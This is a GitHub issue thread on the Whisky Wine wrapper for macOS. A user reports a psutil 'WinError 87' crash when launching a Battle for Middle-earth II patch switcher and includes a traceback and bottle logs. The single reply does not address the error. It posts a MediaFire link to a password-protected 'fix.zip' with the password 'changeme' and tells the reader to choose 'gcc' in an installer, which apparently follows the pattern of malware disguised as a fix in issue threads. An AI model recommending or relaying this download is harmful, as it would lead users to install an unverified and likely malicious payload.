### ISSUE TITLE
[Bug]: 'Sclass 'OSError'' when running an application.

### ISSUE THREAD

**Issue by 9wow** [Whisky-App/Whisky#1109]
### Description

This patcher has a patch to make the game (The Lord of the Rings: The Battle for Middle-earth II) not require a CD-ROM to open. When I try to run the patcher with Whisky I get the error pasted below. 
(This app runs fine on Windows 10 and 11 computers.)
___

- Error message from the patcher:

An unexpected error of type 'Sclass 'OSError'' has occurred:
[winError 87] Invalid parameter: (originated From
NtQuerySystem Information)

- Traceback from the patcher:

Traceback (most recent call last):
  File "main.py", line 1798, in <module>
  File "main.py", line 68, in __init__
  File "main.py", line 75, in __single_instance_control
  File "psutil\__init__.py", line 1445, in process_iter
  File "psutil\__init__.py", line 1426, in add
  File "psutil\__init__.py", line 528, in as_dict
  File "psutil\__init__.py", line 621, in name
  File "psutil\_pswindows.py", line 765, in name
  File "psutil\_pswindows.py", line 696, in wrapper
  File "psutil\_pswindows.py", line 686, in convert_oserror
  File "psutil\_pswindows.py", line 694, in wrapper
  File "psutil\_common.py", line 487, in wrapper
  File "<string>", line 3, in raise_from
  File "psutil\_common.py", line 485, in wrapper
  File "psutil\_pswindows.py", line 781, in exe
OSError: [WinError 87] Invalid parameter: '(originated from NtQuerySystemInformation)'

### Steps to reproduce

1. Create a bottle.
2. Install the game the Patcher is designed for.
3. Install Patcher into the same bottle.
4. Run the Patcher (BFME2Switcher.exe) from installed programs.

### Expected behaviour

The patcher should open and allow me to select a patch version to apply to the game files, I should then be able to run the game it has patched.

### Logs

```bash
Whisky Version: 2.3.2
Date: 2024-08-28T06:09:39Z
macOS Version: 14.6.1

Bottle Name: LOTR BFME
Bottle URL: /Users/User/Library/Containers/com.isaacmarovitz.Whisky/Bottles/3646C0FA-9F4B-4778-80CB-7E2BFC634CDE

Wine Version: 7.7.0
Windows Version: win11
Enhanced Sync: msync

Metal HUD: false
Metal Trace: false

Arguments: start /unix /Users/User/Library/Containers/com.isaacmarovitz.Whisky/Bottles/3646C0FA-9F4B-4778-80CB-7E2BFC634CDE/drive_c/Program Files (x86)/BFME2 Ecth's Patch Switcher/data/BFME2Switcher.exe

Environment:
{
    "DXVK_ASYNC" = 1;
    "GST_DEBUG" = 1;
    WINEDEBUG = "fixme-all";
    WINEESYNC = 1;
    WINEMSYNC = 1;
    WINEPREFIX = "/Users/User/Library/Containers/com.isaacmarovitz.Whisky/Bottles/3646C0FA-9F4B-4778-80CB-7E2BFC634CDE";
}

msync: bootstrapped mach port on wine-d35672-msync.
msync: up and running.
```

### What version of Whisky are you using?

2.3.2

### What version of macOS are you using?

Sonoma (macOS 14)

### Issue Language

- [X] Yes my issue is written in English

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
